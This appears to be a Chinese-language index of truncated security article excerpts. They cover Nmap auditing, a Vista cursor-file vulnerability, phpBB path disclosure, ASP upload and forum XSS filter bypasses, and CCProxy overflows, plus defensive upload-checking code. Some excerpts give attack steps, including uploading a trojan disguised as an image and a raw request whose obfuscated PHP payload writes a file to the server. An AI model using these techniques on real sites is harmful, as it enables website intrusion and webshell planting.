可以这样说，如果你的网络存有漏洞，或者说你的防火墙有漏洞，或者说你的服务器开着不该开放的端口，那你的网络面临着被攻击、被损害的风险。先下手为强。为防止别人毁掉自己的网络，先对自己“狠”一点。我们可以用黑客们采用的方法先测试一下自己的系统。工欲善其事，必先利其器。应该选择什么工具呢？这里我们推荐Nmap。Nmap是一个免费的开源实用程序，它可以对网络进行探查和安全审核。许多网络管理人员还发现它对于网络的设备调查、管理服务升级计划、监视主机或服务的正常运行时间。Nmap使用IP数据包来决定有哪些主机在网络中是可用的，这些主机正提供的服务有哪些，它们运行的操作系统是什么，使用了哪些类型的过滤器或防火...

光标漏洞的复合型蠕虫现身 Vista操作系统曝出首个重大漏洞3月30日，微软Vista操作系统曝出首个重大漏洞。昨天，瑞星反病毒专家发现该漏洞已经开始被黑客利用，使用Windows Vista和XP的用户，在访问带毒网站时会被威金病毒、盗号木马(木马查杀软件下载)等多种病毒感染。据监测，国内已有近十个网站被黑客攻陷。此前，微软公司曾发出警告称，攻击者正在积极利用Windows动画光标(.ani)文件中一个未修复漏洞。这个漏洞将影响Windows XP以上操作系统和IE6以上的浏览器，微软最新的Vista和IE7都不能幸免。目前微软还没有发布此漏洞的补丁。据瑞星安全...

一、Path Disclosure 漏洞文件：/db/oracle.php漏洞描叙：直接访问oracle.php，导致暴露web路径涉及版本：phpbb <=2.013测试：ie提交http://127.0.0.1/phpBB2/db/oracle.php 返回错误：Fatal error: Cannot redeclare sql_nextid() in f:\easyphp1-7\www\phpbb2\db\oracle.php on line 405解决...

涉及到大部分：如动网  还有星空的NF_visual_upfile.asp找到 upload.asp 等等上传图片的地方可以看源代码中有 filepath 或者file，path的字运行WSockExper抓包上传一个asp木马在WSockExper 找到 post …… 的2行 全选 复制到一个txt的文本里  修改：两个底部都要空一行把底下的asp 格式修改成gif 格式-----------------有时要修改上面的数字参数,最...

各种漏洞的利用和一些搜索参数  说到漏洞，首先应该提到的就是动网的上传漏洞了。  "洞网"漏洞拉开了上传漏洞文件的序幕，其他系统的上  传漏洞接踵而来!  asp动网论坛漏洞分析  1、这个漏洞不算太严重，用过动网论坛的人都知道，发帖时直接写javascript会被过滤拆分，写http会自动加上链接，漏洞就在此，在这两个地方变通一下，把两个单词的某个字母换成编码形式，然后系统再对应地解码回字母，就达到了避免被过滤的目的。例子说明一下，在发帖时写入［img］javas&...

看到网上有类似的工具，但分析的文章却没找到，听小黑说黑客手册上有，可惜偶没有杂志，所以就抓包然后看下代码，大致分析了一下。这个漏洞很巧妙、也很经典 ：）   GET /search.php?keyword=By%20CN911&cachefile=an85.php%2500&treadinfo=〈?fputs(fop  en(chr(46).chr(47).chr(46).chr(46).chr(47).chr(46).chr(46).chr(47).chr(98).chr(98).chr(115).chr(...

Part I 前言 现在网上最流行的网站攻击手段，要数得上SQL Injection了，虽然SI技术易学易用，并且容易取得较大的权限，但因其风头实在太大，现在一般稍有点安全意识的程序员都会注意到这个问题，并且通过GET方法提交的数据会被服务器记录在案，而让网管很容易找到入侵者。 非SI类攻击相对来说获得的服务器操作权限不大，但对于以获得数据为目的的入侵还是很有用的。 Part II 方法介绍 常规的非SI类攻击有如下几种： 一、 跨站脚本攻击(XSS) 跨站脚本攻击不会直接对...

CCProxy是一个国产的支持HTTP、FTP、Gopher、SOCKS4/5、Telnet、Secure(HTTPS)、News(NNTP)、 RTSP、MMS等代理协议的代理服务器软件。因为其简单易用、界面友好，非常适合在对流量要求不高的网络环境中使用，所以在国内有很多初级的网管喜欢用这个软件，有时候我在公司上网也要用它做代理。前些日子我测试发现CCProxy 6.0版本存在多处缓冲区溢出漏洞，可以导致攻击者远程执行任意代码。   TIPS：什么是Gopher、RTSP、MMS?   　　Gopher是Inte...

经常听说的ASP上传漏洞，即是将一些木马文件修改后缀名（修改为图像文件后缀），进行上传。针对此情况使用下列函数进行辨别：<%'******************************************************************'CheckFileType函数用来检查文件是否为图片文件'参数filename是本地文件的路径'如果是文件jpeg,gif,bmp,png图片中的一种，函数返回true，否则返回false'******************************************************************consta...

经常听说的ASP上传漏洞，即是将一些木马文件修改后缀名（修改为图像文件后缀），进行上传。针对此情况使用下列函数进行辨别：[code]<%’******************************************************************’CheckFileType 函数用来检查文件是否为图片文件’参数filename是本地文件的路径’如果是文件jpeg,gif,bmp,png图片中的一种，函数返回true，否则返回false’************************************************************...